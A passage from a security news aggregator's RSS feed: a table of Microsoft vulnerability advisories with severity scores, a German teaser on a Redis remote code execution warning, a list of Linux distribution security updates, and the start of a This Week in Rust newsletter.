Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35424">CVE-2026-35424</a></td><td><p>Internet Key Exchange (IKE) Protocol Denial of Service Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40377">CVE-2026-40377</a></td><td><p>Microsoft Cryptographic Services Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34329">CVE-2026-34329</a></td><td><p>Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41097">CVE-2026-41097</a></td><td><p>Secure Boot Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33839">CVE-2026-33839</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33840">CVE-2026-33840</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34330">CVE-2026-34330</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34331">CVE-2026-34331</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35423">CVE-2026-35423</a></td><td><p>Windows 11 Telnet Client Information Disclosure Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>5.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35438">CVE-2026-35438</a></td><td><p>Windows Admin Center Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34344">CVE-2026-34344</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34345">CVE-2026-34345</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35416">CVE-2026-35416</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41088">CVE-2026-41088</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34343">CVE-2026-34343</a></td><td><p>Windows Application Identity (AppID) Subsystem Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35418">CVE-2026-35418</a></td><td><p>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33835">CVE-2026-33835</a></td><td><p>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34337">CVE-2026-34337</a></td><td><p>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40407">CVE-2026-40407</a></td><td><p>Windows Common Log File System Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40397">CVE-2026-40397</a></td><td><p>Windows Common Log File System Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41096">CVE-2026-41096</a></td><td><p>Windows DNS Client Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>9.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42896">CVE-2026-42896</a></td><td><p>Windows DWM Core Library Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35419">CVE-2026-35419</a></td><td><p>Windows DWM Core Library Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34336">CVE-2026-34336</a></td><td><p>Windows DWM Core Library Information Disclosure Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33834">CVE-2026-33834</a></td><td><p>Windows Event Logging Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32209">CVE-2026-32209</a></td><td><p>Windows Filtering Platform (WFP) Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>4.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35421">CVE-2026-35421</a></td><td><p>Windows GDI Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40403">CVE-2026-40403</a></td><td><p>Windows Graphics Component Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40402">CVE-2026-40402</a></td><td><p>Windows Hyper-V Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>9.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33841">CVE-2026-33841</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35420">CVE-2026-35420</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40369">CVE-2026-40369</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34332">CVE-2026-34332</a></td><td><p>Windows Kernel-Mode Driver Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>8.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34339">CVE-2026-34339</a></td><td><p>Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34341">CVE-2026-34341</a></td><td><p>Windows Link-Layer Discovery Protocol (LLDP) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33838">CVE-2026-33838</a></td><td><p>Windows Message Queuing (MSMQ) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32161">CVE-2026-32161</a></td><td><p>Windows Native WiFi Miniport Driver Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41089">CVE-2026-41089</a></td><td><p>Windows Netlogon Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>9.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34342">CVE-2026-34342</a></td><td><p>Windows Print Spooler Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34340">CVE-2026-34340</a></td><td><p>Windows Projected File System Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40398">CVE-2026-40398</a></td><td><p>Windows Remote Desktop Services Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21530">CVE-2026-21530</a></td><td><p>Windows Rich Text Edit Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32170">CVE-2026-32170</a></td><td><p>Windows Rich Text Edit Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40410">CVE-2026-40410</a></td><td><p>Windows SMB Client Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35415">CVE-2026-35415</a></td><td><p>Windows Storage Spaces Controller Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34350">CVE-2026-34350</a></td><td><p>Windows Storport Miniport Driver Denial of Service Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40405">CVE-2026-40405</a></td><td><p>Windows TCP/IP Denial of Service Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40414">CVE-2026-40414</a></td><td><p>Windows TCP/IP Denial of Service Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40401">CVE-2026-40401</a></td><td><p>Windows TCP/IP Denial of Service Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40413">CVE-2026-40413</a></td><td><p>Windows TCP/IP Denial of Service Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35422">CVE-2026-35422</a></td><td><p>Windows TCP/IP Driver Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34351">CVE-2026-34351</a></td><td><p>Windows TCP/IP Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40399">CVE-2026-40399</a></td><td><p>Windows TCP/IP Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34334">CVE-2026-34334</a></td><td><p>Windows TCP/IP Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40406">CVE-2026-40406</a></td><td><p>Windows TCP/IP Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33837">CVE-2026-33837</a></td><td><p>Windows TCP/IP Local Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40415">CVE-2026-40415</a></td><td><p>Windows TCP/IP Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42825">CVE-2026-42825</a></td><td><p>Windows Telephony Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34338">CVE-2026-34338</a></td><td><p>Windows Telephony Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40382">CVE-2026-40382</a></td><td><p>Windows Telephony Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40380">CVE-2026-40380</a></td><td><p>Windows Volume Manager Extension Driver Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40408">CVE-2026-40408</a></td><td><p>Windows WAN ARP Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34333">CVE-2026-34333</a></td><td><p>Windows Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34347">CVE-2026-34347</a></td><td><p>Windows Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35417">CVE-2026-35417</a></td><td><p>Windows Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr></tbody></table><h2>Critical RCEs and EoPs</h2><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33109">CVE-2026-33109</a></td><td><p>Azure Managed Instance for Apache Cassandra Remote Code Execution Vulnerability</p></td><td><p>N/A</p></td><td><p>No</p></td><td><p>9.9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33844">CVE-2026-33844</a></td><td><p>Azure Managed Instance for Apache Cassandra Remote Code Execution Vulnerability</p></td><td><p>N/A</p></td><td><p>No</p></td><td><p>9.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42823">CVE-2026-42823</a></td><td><p>Azure Logic Apps Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>9.9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42898">CVE-2026-42898</a></td><td><p>Microsoft Dynamics 365 On-Premises Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>9.9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42833">CVE-2026-42833</a></td><td><p>Microsoft Dynamics 365 On-Premises Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>9.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41103">CVE-2026-41103</a></td><td><p>Microsoft SSO Plugin for Jira &amp; Confluence Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>9.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41096">CVE-2026-41096</a></td><td><p>Windows DNS Client Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>9.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40402">CVE-2026-40402</a></td><td><p>Windows Hyper-V Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>9.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41089">CVE-2026-41089</a></td><td><p>Windows Netlogon Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>9.8</p></td></tr></tbody></table><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Redis-Sicherheitslücken: Risiko für UNIX-Systeme und Linux-Distributionen]]></title>
<description><![CDATA[BERLIN / LONDON (IT BOLTWISE) – Eine kürzlich entdeckte Sicherheitslücke in Redis bedroht UNIX-basierte Systeme und verschiedene Linux-Distributionen. Das Bundesamt für Sicherheit in der Informationstechnik (BSI) hat eine Warnung herausgegeben, die auf die Möglichkeit hinweist, dass Angreifer bel...]]></description>
<link>https://tsecurity.de/de/3507453/it-security-nachrichten/redis-sicherheitsluecken-risiko-fuer-unix-systeme-und-linux-distributionen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3507453/it-security-nachrichten/redis-sicherheitsluecken-risiko-fuer-unix-systeme-und-linux-distributionen/</guid>
<pubDate>Mon, 11 May 2026 16:55:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-redis-security.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-redis-security.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-redis-security-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-redis-security-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-redis-security-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-redis-security-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-redis-security-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">BERLIN / LONDON (IT BOLTWISE) – Eine kürzlich entdeckte Sicherheitslücke in Redis bedroht UNIX-basierte Systeme und verschiedene Linux-Distributionen. Das Bundesamt für Sicherheit in der Informationstechnik (BSI) hat eine Warnung herausgegeben, die auf die Möglichkeit hinweist, dass Angreifer beliebigen Programmcode ausführen können. Die betroffenen Systeme umfassen Fedora Linux, SUSE openSUSE und Open Source Redis. Redis, ein […]</p>
<div><a href="https://www.it-boltwise.de/redis-sicherheitsluecken-risiko-fuer-unix-systeme-und-linux-distributionen.html">... den vollständigen Artikel <strong>»Redis-Sicherheitslücken: Risiko für UNIX-Systeme und Linux-Distributionen«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/redis-sicherheitsluecken-risiko-fuer-unix-systeme-und-linux-distributionen.html">Redis-Sicherheitslücken: Risiko für UNIX-Systeme und Linux-Distributionen</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (corosync, freeipmi, kernel, and kernel-rt), Debian (corosync, firefox-esr, kernel, lcms2, libpng1.6, linux-6.1, php8.2, php8.4, postorius, pyjwt, and tor), Fedora (dotnet10.0, exim, gnutls, kernel, nextcloud, nodejs22, php, proftpd, prosody, python-...]]></description>
<link>https://tsecurity.de/de/3507119/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3507119/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 11 May 2026 15:14:36 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (corosync, freeipmi, kernel, and kernel-rt), <b>Debian</b> (corosync, firefox-esr, kernel, lcms2, libpng1.6, linux-6.1, php8.2, php8.4, postorius, pyjwt, and tor), <b>Fedora</b> (dotnet10.0, exim, gnutls, kernel, nextcloud, nodejs22, php, proftpd, prosody, python-pulp-glue, python-requests, rclone, and SDL3_image), <b>Mageia</b> (firefox, nss, rootcerts, openvpn, thunderbird, and vim), <b>Oracle</b> (corosync, freeipmi, gstreamer1-plugins-bad-free, gstreamer1-plugins-base, and gstreamer1-plugins-good, kernel, libpng, and mingw-libtiff), <b>Slackware</b> (kernel and mozilla), <b>SUSE</b> (build, product-composer, c-ares, cairo, copacetic, distribution, firefox, firefox-esr, frr, glibc, go1.25, google-cloud-sap-agent, iproute2, java-11-openj9, java-17-openj9, java-17-openjdk, java-1_8_0-openj9, java-21-openj9, java-21-openjdk, java-25-openjdk, kernel, libexif-devel, libpcp-devel, libtpms, libtree-sitter0_26, Mesa, micropython, mozjs128, nginx, opencc, openCryptoki, php-composer2, podman, postfix, python-pytest, python311-Django, python311-Django4, redis, semaphore, strongswan, terraform-provider-aws, terraform-provider-azurerm, terraform-provider-external, terraform-provider-google, terraform-provider-helm, terraform-provider-kubernetes, terraform-provid, tor, valkey, vim, and wireshark), and <b>Ubuntu</b> (linux-nvidia-tegra, linux-raspi, linux-raspi-5.4, and nasm).]]></content:encoded>
</item>
<item>
<title><![CDATA[This Week In Rust: This Week in Rust 649]]></title>
<description><![CDATA[Hello and welcome to another issue of This Week in Rust!
Rust is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
@thisweekinrust.bsky.social on Bluesky or
@ThisWeekinRu...]]></description>
<link>https://tsecurity.de/de/3501631/tools/this-week-in-rust-this-week-in-rust-649/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501631/tools/this-week-in-rust-this-week-in-rust-649/</guid>
<pubDate>Fri, 08 May 2026 23:24:31 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello and welcome to another issue of <em>This Week in Rust</em>!
<a href="https://www.rust-lang.org/">Rust</a> is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
<a href="https://bsky.app/profile/thisweekinrust.bsky.social">@thisweekinrust.bsky.social</a> on Bluesky or
<a href="https://mastodon.social/@thisweekinrust">@ThisWeekinRust</a> on mastodon.social, or
<a href="https://github.com/rust-lang/this-week-in-rust">send us a pull request</a>.
Want to get involved? <a href="https://github.com/rust-lang/rust/blob/main/CONTRIBUTING.md">We love contributions</a>.</p>
<p><em>This Week in Rust</em> is openly developed <a href="https://github.com/rust-lang/this-week-in-rust">on GitHub</a> and archives can be viewed at <a href="https://this-week-in-rust.org/">this-week-in-rust.org</a>.
If you find any errors in this week's issue, <a href="https://github.com/rust-lang/this-week-in-rust/pulls">please submit a PR</a>.</p>
<p>Want TWIR in your inbox? <a href="https://this-week-in-rust.us11.list-manage.com/subscribe?u=fd84c1c757e02889a9b08d289&amp;id=0ed8b72485">Subscribe here</a>.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-rust-community">Updates from Rust Community</a></h4>


<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#newsletters">Newsletters</a></h5>
<ul>
<li><a href="https://www.theembeddedrustacean.com/p/the-embedded-rustacean-issue-70">The Embedded Rustacean Issue #70</a></li>
<li><a href="https://scientificcomputing.rs/monthly/2026-04">Scientific Computing in Rust #17 (April 2026)</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#projecttooling-updates">Project/Tooling Updates</a></h5>
<ul>
<li><a href="https://github.com/yvgude/lean-ctx/blob/main/blog/twir-lean-ctx.md">lean-ctx: A Context Runtime for AI Coding Agents</a></li>
<li><a href="https://zed.dev/blog/zed-1-0">Zed is 1.0</a></li>
<li><a href="https://github.com/niri-wm/niri/releases/tag/v26.04">Niri v26.04</a></li>
<li><a href="https://symposium.dev/blog/announcing-symposium.html">Announcing Symposium</a></li>
<li><a href="https://www.menhera.org/crates-io-cooldown-proxy-mitigating-supply-chain-attacks/">menhera-cooldown: The crates.io Cooldown Proxy</a></li>
<li><a href="https://github.com/dertin/cargo-cooldown/releases/tag/v0.3.0">cargo-cooldown 0.3.0: a Cargo wrapper for supply-chain cooldowns</a></li>
<li><a href="https://github.com/greyblake/nutype/releases/tag/v0.7.0">Nutype 0.7.0</a></li>
<li><a href="https://aimdb.dev/blog/reactive-pipelines">AimDB: Reactive Pipelines as the Engine of the Data-First Architecture</a></li>
<li><a href="https://ohaswin.github.io/blog/pyscan-v2/">pyscan v2.1.0: Python Dependency Vulnerability Scanner</a></li>
<li><a href="https://flodl.dev/blog/huggingface-both-ways">flodl 0.5.3</a></li>
<li><a href="https://kvark.github.io/blade/xr/2026/03/21/blade-xr-asteroids.html">Blade XR Asteroids</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#observationsthoughts">Observations/Thoughts</a></h5>
<ul>
<li><a href="https://corrode.dev/blog/bugs-rust-wont-catch/">Bugs Rust Won't Catch</a></li>
<li><a href="https://miren.dev/blog/gopher-meets-crab">A Gopher Meets a Crab</a></li>
<li><a href="https://chrisdell.info/using-rust-to-build-a-1-dollar-handheld-gaming-console/">Using Rust to Build a $1 Handheld Gaming Console</a></li>
<li><a href="https://kerkour.com/rust-databases">All databases will eventually be (re)written in Rust</a></li>
<li>[video] <a href="https://www.youtube.com/playlist?list=PLbcv9d2YUhnbCxJmjB_4RbjUBgq6exSGs">Rust India Conference 2026 — Full Talk Recordings</a></li>
